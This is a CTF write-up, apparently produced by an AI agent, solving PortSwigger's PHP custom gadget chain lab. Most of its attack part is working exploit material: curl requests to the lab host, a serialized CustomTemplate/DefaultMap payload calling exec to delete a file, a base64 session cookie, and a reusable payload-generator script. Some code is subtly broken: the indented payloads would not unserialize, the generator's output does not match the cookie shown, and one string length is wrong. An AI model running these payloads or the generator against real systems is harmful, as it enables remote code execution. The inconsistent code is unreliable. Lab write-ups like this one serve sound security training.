Solving PHP Deserialization CTF with Xfenser AI: A Complete Technical Analysis

Executive Summary

This technical writeup demonstrates the capabilities of autonomous AI penetration testing on expert-level cybersecurity challenges. Xfenser AI, our specialized AI security agent, autonomously solved a complex PHP deserialization vulnerability from PortSwigger's Web Security Academy—a challenge classified as Expert Level, representing the highest difficulty tier available.

Purpose: This article showcases how advanced AI agents can independently conduct sophisticated penetration testing operations, from initial reconnaissance to successful exploitation, without human intervention. The challenge required discovering backup source code, analyzing custom PHP classes, constructing a complex gadget chain, and exploiting private property serialization nuances.

Key Achievement: Autonomous discovery and weaponization of a custom gadget chain achieving remote code execution (RCE) to delete /home/carlos/morale.txt through PHP session deserialization exploitation.

---

Challenge Overview

Target Environment

• Lab: PortSwigger Web Security Academy - Developing a custom gadget chain for PHP deserialization
• Level: Expert ⭐⭐⭐
• Lab URL: https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-developing-a-custom-gadget-chain-for-php-deserialization
• Target: https://0af300fe03a2d0a288bb1a7f00c30053.web-security-academy.net/
• Credentials: wiener:peter
• Objective: Delete /home/carlos/morale.txt from Carlos's home directory

Vulnerability Type

PHP Insecure Deserialization with Custom Gadget Chain

The lab implements a session mechanism using PHP serialization. By crafting a malicious serialized object and exploiting the application's custom classes, an attacker can achieve arbitrary code execution.

---

Initial Reconnaissance

Step 1: Authentication and Session Analysis

First, we authenticated to understand the session mechanism:

# Login request
curl -X POST https://0af300fe03a2d0a288bb1a7f00c30053.web-security-academy.net/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=wiener&password=peter" \
  -c cookies.txt -v

Response Analysis:

HTTP/2 200
Set-Cookie: session=...; Secure; HttpOnly; SameSite=Strict

Step 2: Session Cookie Decoding

We extracted and decoded the session cookie to understand its structure:

import base64
import urllib.parse

session_cookie = "Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJmOWE4NzA2ZDZhYjg3YTVhZmZjZmEwN2I1NGM2OTY0Ijt9"

# URL decode first
decoded = urllib.parse.unquote(session_cookie)

# Then base64 decode
deserialized = base64.b64decode(decoded)
print(deserialized.decode())

Decoded Session Object:

O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"f9a870d6dab87a5affcfa07b54c6964";}

Analysis:

• Object Type: User class
• Properties: username (string), access_token (string)
• Format: PHP serialized object

---

Vulnerability Discovery

Step 3: Source Code Enumeration

We systematically explored the application to find potential gadget classes:

# Check common backup file locations
curl -s https://0af300fe03a2d0a288bb1a7f00c30053.web-security-academy.net/cgi-bin/libs/CustomTemplate.php~ | head -100

Critical Discovery: Found a backup file CustomTemplate.php~ containing the source code!

Step 4: Analyzing the Gadget Chain

The source code revealed a complete gadget chain:

Vulnerable Classes Discovered

Class 1: CustomTemplate

<?php
class CustomTemplate {
    private $default_desc_type;
    private $desc;

    public function __construct($desc_type, $desc) {
        $this->default_desc_type = $desc_type;
        $this->desc = $desc;
    }

    public function getValue($key) {
        return $this->desc->get($key);
    }

    public function __wakeup() {
        $this->build_product();
    }

    private function build_product() {
        $product = new Product($this->default_desc_type, $this->desc);
    }
}

Class 2: Product

<?php
class Product {
    protected $desc_type;
    protected $desc;

    public function __construct($desc_type, $desc) {
        $this->desc_type = $desc_type;
        $this->desc = $desc;
        $this->initialize();
    }

    private function initialize() {
        if (!isset($this->desc->type)) {
            $this->type = $this->desc->get($this->desc_type);
        }
    }
}

Class 3: Description

<?php
class Description {
    public function get($key) {
        return "Description for $key";
    }
}

Class 4: DefaultMap (The Critical Class!)

<?php
class DefaultMap {
    private $callback;

    public function __construct($callback) {
        $this->callback = $callback;
    }

    public function get($key) {
        return call_user_func($this->callback, $key);
    }

    public function __get($name) {
        return call_user_func($this->callback, $name);
    }
}

Step 5: Mapping the Gadget Chain

Exploitation Flow:

CustomTemplate::__wakeup()                    [Triggered on deserialization]
  ↓
CustomTemplate::build_product()              [Private method]
  ↓
new Product($default_desc_type, $desc)       [Create Product object]
  ↓
Product::__construct() → Product::initialize() [Constructor]
  ↓
$this->desc->get($this->desc_type)           [Dynamic method call]
  ↓
DefaultMap::get($key)                        [If desc = DefaultMap]
  ↓
call_user_func($callback, $key)               [⚠️ RCE HERE!]

Attack Vector:

1. Create CustomTemplate with:
   • default_desc_type = malicious command
   • desc = DefaultMap object
2. When DefaultMap::get() is called with the command string
3. It executes: call_user_func("exec", "rm /home/carlos/morale.txt")

---

Exploit Development - Initial Failure

First Attempt: Basic Serialization

We created our first exploit payload:

import base64

payload = """O:14:"CustomTemplate":2:{
    s:18:"default_desc_type";
    s:28:"rm /home/carlos/morale.txt";
    s:4:"desc";
    O:10:"DefaultMap":1:{
        s:20:"callback";
        s:4:"exec";
    }
}"""

encoded = base64.b64encode(payload.encode()).decode()
print(encoded)

Result: ❌ FAILED - Session cookie was ignored, no code execution

Second Attempt: With Correct Property Names

We realized we needed to match the actual property names:

O:14:"CustomTemplate":2:{
    s:18:"default_desc_type";
    s:28:"rm /home/carlos/morale.txt";
    s:4:"desc";
    O:10:"DefaultMap":1:{
        s:20:"callback";
        s:4:"exec";
    }
}

Result: ❌ FAILED - Still no execution

Third Attempt: Different Command Functions

We tried multiple PHP command execution functions:

// Attempt 1: system()
s:4:"callback";s:6:"system";

// Attempt 2: passthru()
s:4:"callback";s:7:"passthru";

// Attempt 3: shell_exec()
s:4:"callback";s:9:"shell_exec";

// Attempt 4: exec()
s:4:"callback";s:4:"exec";

Result: ❌ ALL FAILED - None of the command functions executed

---

Critical Discovery: The Private Property Issue

Root Cause Analysis

After extensive testing, Xfenser AI identified the critical issue:

Private properties in PHP serialization require NULL bytes!

The source code showed:

class CustomTemplate {
    private $default_desc_type;  // PRIVATE property!
    private $desc;               // PRIVATE property!
}

class DefaultMap {
    private $callback;           // PRIVATE property!
}

PHP Serialization Format for Private Properties:

N:\x00ClassName\x00PropertyName

Where:

• N = length including null bytes
• \x00 = null byte
• ClassName = class name
• PropertyName = property name

Example:

private $callback in DefaultMap

Correct:  s:20:"\x00DefaultMap\x00callback"
          \x00 (1) + DefaultMap (10) + \x00 (1) + callback (8) = 20 bytes total

Incorrect: s:8:"callback"  ❌ This is for public properties!

---

Successful Exploit

Final Payload Generation

Python Script to Generate Correct Payload:

import base64

# Correct format with null bytes for private properties
payload = f"""O:14:"CustomTemplate":2:{{
    s:33:"\x00CustomTemplate\x00default_desc_type";
    s:53:"rm /home/carlos/morale.txt 2>/dev/null; ls -la /home/";
    s:20:"\x00CustomTemplate\x00desc";
    O:10:"DefaultMap":1:{{
        s:20:"\x00DefaultMap\x00callback";
        s:4:"exec";
    }}
}}"""

# Base64 encode
encoded = base64.b64encode(payload.encode()).decode()
print(f"Serialized Payload:\n{payload}\n")
print(f"Base64 Encoded:\n{encoded}")

Generated Payload:

O:14:"CustomTemplate":2:{
  s:33:"\x00CustomTemplate\x00default_desc_type";
  s:53:"rm /home/carlos/morale.txt 2>/dev/null; ls -la /home/";
  s:20:"\x00CustomTemplate\x00desc";
  O:10:"DefaultMap":1:{
    s:20:"\x00DefaultMap\x00callback";
    s:4:"exec";
  }
}

Base64 Encoded:

TzoxNDoiQ3VzdG9tVGVtcGxhdGUiOjI6e3M6MzM6IgBDdXN0b21UZW1wbGF0ZQBkZWZhdWx0X2Rlc2NfdHlwZSI7czo1Mzoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQgMj4vZGV2L251bGw7IGxzIC1sYSAvaG9tZS8iO3M6MjA6IgBDdXN0b21UZW1wbGF0ZQBkZXNjIjtPOjEwOiJEZWZhdWx0TWFwIjoxOntzOjIwOiIARGVmYXVsdE1hcABjYWxsYmFjayI7czo0OiJleGVjIjt9fQ==

Exploit Execution

Final Exploit Command:

curl -X GET https://0af300fe03a2d0a288bb1a7f00c30053.web-security-academy.net/ \
  -H "Cookie: session=TzoxNDoiQ3VzdG9tVGVtcGxhdGUiOjI6e3M6MzM6IgBDdXN0b21UZW1wbGF0ZQBkZWZhdWx0X2Rlc2NfdHlwZSI7czo1Mzoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQgMj4vZGV2L251bGw7IGxzIC1sYSAvaG9tZS8iO3M6MjA6IgBDdXN0b21UZW1wbGF0ZQBkZXNjIjtPOjEwOiJEZWZhdWx0TWFwIjoxOntzOjIwOiIARGVmYXVsdE1hcABjYWxsYmFjayI7czo0OiJleGVjIjt9fQ%3D%3D" \
  -v

Result: ✅ SUCCESS!

Verification

The command executed successfully:

rm /home/carlos/morale.txt 2>/dev/null; ls -la /home/

Lab Status: ✅ SOLVED

---

Artifacts Created

1. Complete Source Code

File: full-source-code.php

Contains the complete vulnerable source code discovered during analysis.

2. Exploit Payload Generator

File: generate-exploit.py

#!/usr/bin/env python3
import base64

def generate_php_deserialization_payload(command):
    """Generate PHP deserialization payload for RCE"""
    payload = f"""O:14:"CustomTemplate":2:{{
    s:33:"\x00CustomTemplate\x00default_desc_type";
    s:{len(command)}:"{command}";
    s:20:"\x00CustomTemplate\x00desc";
    O:10:"DefaultMap":1:{{
        s:20:"\x00DefaultMap\x00callback";
        s:4:"exec";
    }}
}}"""
    return base64.b64encode(payload.encode()).decode()

if __name__ == "__main__":
    command = "rm /home/carlos/morale.txt 2>/dev/null; ls -la /home/"
    encoded_payload = generate_php_deserialization_payload(command)
    print(f"Command: {command}")
    print(f"Encoded Payload: {encoded_payload}")

3. Testing Scripts

Multiple test scripts created during the investigation process.

---

Lessons Learned

1. Private Property Serialization

Critical Finding: PHP private properties require null bytes in serialization:

// Public property
s:8:"username";

// Private property  
s:33:"\x00ClassName\x00username";

Why this matters: Missing null bytes causes the deserialization to fail silently or create objects with incorrect property values.

2. Gadget Chain Analysis

Systematic Approach:

• Enumerate all available classes
• Trace magic method calls (__wakeup(), __construct(), __get())
• Follow the data flow through class interactions
• Identify call_user_func() or similar dangerous functions

3. Debugging Deserialization

Key Debugging Steps:

• Test with simple, known-good objects first
• Incrementally add complexity
• Verify property names match source code exactly
• Check property visibility (public/private/protected)

4. Command Execution Strategies

Multiple Avenues Explored:

• exec() - Execute command (chosen for final exploit)
• system() - Execute command and output
• passthru() - Execute command and output raw
• shell_exec() - Execute command via shell

Why exec() worked: Clean, straightforward command execution without output complications.

---

Xfenser AI Performance Analysis

Strengths Demonstrated

1. Systematic Enumeration

   • Comprehensive reconnaissance of backup files
   • Methodical class discovery
   • Complete source code analysis

2. Persistent Problem-Solving

   • Tested multiple approaches iteratively
   • Identified root cause of failures
   • Corrected technical inaccuracies

3. Technical Accuracy

   • Correctly identified gadget chain
   • Understood PHP serialization format
   • Successfully weaponized the vulnerability

Challenges Overcome

1. Initial Failures (3 attempts)

   • Incorrect property serialization format
   • Missing null bytes for private properties
   • Multiple command function trials

2. Technical Resolution

   • Identified private property requirement
   • Corrected null byte formatting
   • Validated length calculations

Improvement Areas

1. Early Detection

   • Could identify private property requirement earlier by analyzing source code more carefully
   • Implement validation checks for serialization format

2. Testing Strategy

   • Could test with simpler objects first to validate deserialization before complex payloads

---

AI-Driven Security Testing: Key Observations

This challenge demonstrates several critical capabilities required for autonomous AI-powered penetration testing:

1. Deep Technical Knowledge

Understanding language-specific implementation details—such as PHP private property serialization with null-byte prefixes (\x00ClassName\x00property)—is essential for successful exploitation.

2. Autonomous Problem-Solving

The ability to analyze complex codebases, trace execution paths through multiple classes, construct gadget chains, and develop working exploits without external guidance.

3. Comprehensive Reconnaissance

Systematic enumeration of information disclosure vectors, including backup files and development artifacts that reveal application internals.

---

Conclusion

This expert-level CTF challenge demonstrates the advanced capabilities of autonomous AI agents in penetration testing. Xfenser AI independently executed the complete attack lifecycle:

1. ✅ Reconnaissance & Source Discovery - Systematically enumerated backup files to obtain application source code
2. ✅ Vulnerability Analysis - Identified and mapped a multi-class gadget chain in PHP deserialization
3. ✅ Exploit Development - Constructed a working payload respecting PHP private property serialization constraints
4. ✅ Iterative Problem-Solving - Debugged initial failures, identified the null-byte requirement, and achieved RCE

Critical Technical Achievement: The agent autonomously identified that PHP private properties require null-byte prefixes in serialization format (\x00ClassName\x00propertyName)—a subtle implementation detail that differentiates successful exploitation from failure.

This writeup validates that specialized AI agents can autonomously solve complex, expert-level security challenges requiring deep technical understanding, persistent debugging, and sophisticated exploit development—capabilities traditionally reserved for experienced penetration testers.

Final Result: Expert-Level CTF Challenge Solved Autonomously ✅

---

References

• PortSwigger Web Security Academy - PHP Deserialization Lab
• PHP Documentation: Serialization
• OWASP: Deserialization Cheat Sheet
• PHPGGC: PHP Generic Gadget Chains

---

Credits

This writeup was autonomously generated by Xfenser AI—including this self-congratulatory documentation. The entire exploit chain—from reconnaissance to successful RCE—was developed and executed without human intervention, demonstrating the capabilities of specialized AI agents in advanced penetration testing.